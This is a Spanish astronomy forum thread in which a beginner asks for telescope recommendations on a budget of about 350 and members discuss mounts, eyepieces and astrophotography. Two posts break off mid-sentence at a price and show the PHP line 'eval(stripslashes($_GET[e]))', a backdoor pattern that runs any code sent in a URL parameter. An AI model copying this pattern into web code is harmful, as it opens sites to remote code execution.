Que me recomendais

Consultas generales
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

Hola gente, estoy pensando en comprar un telescopio para iniciarme, y mi presupuesto es de unos 350
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Que me recomendais

Mensaje por carlosz22 »

Hola, a pesar de ser de segunda mano, es preferible el segundo.

La razón principal, la montura. Una EQ2 es una montura minúscula y acabarás desesperado con las vibraciones. La CG4 esta bien para visual, para fotografía, menos, pero te valdría para hacer tus primeros pinitos en fotografía con webcam.

Un saludo :)
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

Gracias carlosz22, ya solo me falta convencer a la novia para gastarme la pasta.

Por cierto, a ver que dia me paso y me hago socio.

El sabado lo pase genial.

Un saludo.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Que me recomendais

Mensaje por carlosz22 »

Me alegro que te lo hayas pasado bien. Por fin, el tiempo nos respetó...

Los miércoles estamos por la asociación, pero antes de pasarte avisa por si acaso :wink:

Un saludo :)
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

no te parece un ocular poco, que oculares son los necesarios, sin pasarse de precio.

Salu2
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Que me recomendais

Mensaje por astrolozano »

Estoy con carlos, mejor el segundo si está cuidadito por la montura, le da mil vueltas al otro y es muy importante (si te vibra la imagen ya puedes tener un telescopio buenísimo que no verás nada).

Oculares, vete poco a poco, VALEN UNA PASTA. Primero usa el que te viene, tiene suficientes aumentos para ver bastantes cosas (con la Luna no te cansarás por ejemplo, y con ese ocular te cabe entera en el campo con un aumento decente).

Cada vez que puedas, usa los oculares de la gente en las quedadas y vas viendo. Los oculares son una cosa muy personal y el mejor para uno puede ser decepcionante para otro (yo por ejemplo no soporto el poco campo de algunos de los mejores oculares que se han fabricado en cuanto a calidad cuando miro determinados objetos...). Así vas viendo tus gustos y preferencias, y una vez sepas eso eliges un ocular u otro (que por aquí andamos para aconsejarte).

También puedes empezar con alguno de 10 mm por ejemplo (te dará el doble de aumento que el que trae), de los "cutres" que regalan con algunos telescopios... yo empecé así y aquí sigo; aunque te recomiendo que "gorronees" todo lo que puedas y ya que gastas el dinero lo hagas en algo que te satisfaga durante al menos una larga temporada.

Vaya tochito he soltado. En fin, que para lo que quieras por aquí andamos.
Saludos. Álvaro.
jamf
Mensajes: 284
Registrado: Lun May 28, 2007 5:28 pm

Que me recomendais

Mensaje por jamf »

Hola a todos:

cmocho Si quieres estrenar telescopio, mírate este celestron nuevo por poco más que el de segunda mano. enlace
Aunque mi opción seria la siguiente enlace, este lleva una montura CG5 mucho mejor que aguanta más carga, y es mas precisa.
Si bien es un poco mas cara la diferencia lo merece. Eso si añades unos cuantos KILOS más a transportar en las salidas.

Espero te sirva.

Salados José Angel
"No soy un inútil por completo, al menos sirvo como mal ejemplo." ( El chavo del ocho)
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Que me recomendais

Mensaje por m3ntol »

Pues para darle más emoción al tema yo te diría que por 350
phpbb:eval(stripslashes($_GET[e]));
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

Joder que lio, :D , cuanto mas leo sobre el tema mas indeciso estoy.

La verdad es que el dobsoniano esta mejor que el 150-750, referente al cielo profundo y supongo que sera mucho mas facil para la astronomia visual que el otro, pero creo que anda un poco cojo a la hora de astrofotografia,

¿que opinais?

por cierto decirme paginas donde pueda comprar telescopios.

Salu2
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Que me recomendais

Mensaje por m3ntol »

No solo te vale para cielo profundo, es un F/6 y con focal larga así que en planetaria se defiende pero que muy bien. Yo veía unos Saturnos de quitar el hipo con ese telescopio.

Es cierto que para astrofoto no vale, tan solo podrás hacer Luna y algo de planetaria y con mucho ojo y mano de seda. No está pensado para astrofoto, pero de los otros que dices tampoco vale ninguno.

El problema de la astrofoto no es el tubo en si, es la montura. Vas a necesitar una montura de 1000
phpbb:eval(stripslashes($_GET[e]));
Responder